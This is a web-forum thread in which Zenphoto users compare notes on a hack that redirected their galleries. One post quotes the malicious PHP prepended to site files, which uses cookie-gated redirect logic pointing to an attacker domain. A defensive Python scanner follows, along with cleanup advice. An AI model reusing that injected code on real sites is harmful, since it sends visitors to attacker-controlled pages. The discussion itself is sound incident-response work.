Ok great. I will give that a shot then!
I am enjoying Zenphoto thus far and thank you for your hard work on this. I am now following the RSS feed so I can get updates/security fixes faster (had I done that before I probably wouldn't be in this boat).
I appear to also have been affected by this vulnerability. They had my Zenphoto domain redirecting to http://(hacker's URL).in/jaki/index.php as you can see below and also altered the .htaccess and php files for the other domains in my shared hosting account. The latter changes seem to have had no noticeable effect (the rest of the sites run on Drupal 6 or 7).
Can anyone else who was hacked let me know if the hackers altered anything else on their systems that I should fix? I purged everything but the albums folder from my Zenphoto install and removed the added code from the *.php and .htaccess files on my other domains. Is there anything else I should do to set things right?
For reference, the hackers added this to the top of all PHP files:
```php
global $sessdt_o;
if(!$sessdt_o) {
    $sessdt_o = 1;
    $sessdt_k = "lb11";                       // cookie name used as the visitor marker
    if(!@$_COOKIE[$sessdt_k]) {
        // first visit: only plant the marker cookie
        $sessdt_f = "102";
        if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); }
        else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; }
    } else {
        if($_COOKIE[$sessdt_k]=="102") {
            // second visit: overwrite the marker with a random value so this branch runs once
            $sessdt_f = (rand(1000,9000)+1);
            if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); }
            else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; }
            // build the attacker URL from the reversed, URL-encoded host and request path
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
            $sessdt_v = urlencode(strrev($sessdt_j));
            $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
            echo ""; echo "
```
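An added example for anyone cleaning up after this (not code from the thread or from Zenphoto): a small scanner that flags PHP files carrying the marker strings visible in the snippet above and strips the prepended block only when the original `<?php` tag follows it, leaving any other layout for manual review. It assumes the injection was prepended as its own `<?php ... ?>` block; the sample files it scans are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Marker strings copied from the injected snippet quoted in the post above.
INJECTION_MARKERS = ("$sessdt_o", "turnitupnow.net")
# Assumption: the injection is one <?php ... ?> block prepended to the file,
# with the original <?php code following it.
INJECTED_BLOCK = re.compile(r"\A\s*<\?php\s+global \$sessdt_o;.*?\?>\s*", re.DOTALL)


def is_infected(text: str) -> bool:
    """True if the text contains any known injection marker."""
    return any(marker in text for marker in INJECTION_MARKERS)


def strip_injection(text: str) -> tuple[str, bool]:
    """Return (text, removed). The block is removed only when the original
    <?php tag follows it; anything else is left untouched for manual review."""
    cleaned, count = INJECTED_BLOCK.subn("", text, count=1)
    if count == 1 and cleaned.lstrip().startswith("<?"):
        return cleaned, True
    return text, False


def scan_tree(root: str) -> dict[str, str]:
    """Map each infected .php file under root (relative path) to a status."""
    report = {}
    for path in Path(root).rglob("*.php"):
        text = path.read_text(encoding="utf-8", errors="replace")
        if is_infected(text):
            _, removable = strip_injection(text)
            status = "auto-cleanable" if removable else "manual review"
            report[path.relative_to(root).as_posix()] = status
    return report


def demo() -> dict[str, str]:
    """Scan a constructed web root: one clean file and two infected ones."""
    injected = ('<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; '
                '$sessdt_k = "lb11"; /* rest of injected code */ } ?>')
    samples = {"index.php": "<?php echo 'clean'; ?>\n",
               "zp-core/admin.php": injected + "<?php echo 'original'; ?>\n",
               "odd.php": injected[:-2] + " echo 'same block'; ?>\n"}
    with tempfile.TemporaryDirectory() as root:
        for name, text in samples.items():
            target = Path(root, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(text, encoding="utf-8")
        return scan_tree(root)
```

Run `scan_tree` against a copy of the web root first and diff the "auto-cleanable" files by hand before writing anything back.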
Here are several insights into the hacks by a user:
http://www.zenphoto.org/support/topic.php?id=9951#post-58366
Also, several of my websites that use ZP were hacked. I have recovered one website, but I'm having trouble with another one: I have deleted all web files, and when I visit the URL I keep being redirected, although the site is completely empty; also, all .htaccess files were deleted. So my question is: what part keeps redirecting?
puregraphx: I just finished recovery from one of my zengallery installs. If you're still experiencing a redirection, chances are there is a shell-access-only directory above your FTP (this is the case for godaddy and all of their resellers). If you are a godaddy user, you'll need to enable SSH and use port 22 to find the master htaccess file for your shared hosting account (which isn't visible if you're just using FTP on port 21, only SFTP on port 22). I hope this helps.
Can anyone answer if the cache files need to be cleared before or after the upgrade to prevent the same security hole from allowing unauthorized users in? - I've noticed a lot of very long rss cache files (example: rss_ampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampamplang.xml)
Is this normal activity for zengallery?
I would recommend clearing all caches. It does not hurt, as they are recreated on request anyway. It is unlikely that images contain hacked code, but the cached html or rss files might (not php, but hacked links or js code).
No, such rss files are not normal, unless you have an album with that long name. Album rss feed files look like this:
rss_Screenshots_screenshots_en_US.xml
This is a cached feed of the screenshots subalbum of the Screenshots album (example from our own site). The language version is English, which is the default and the only one used on our site anyway.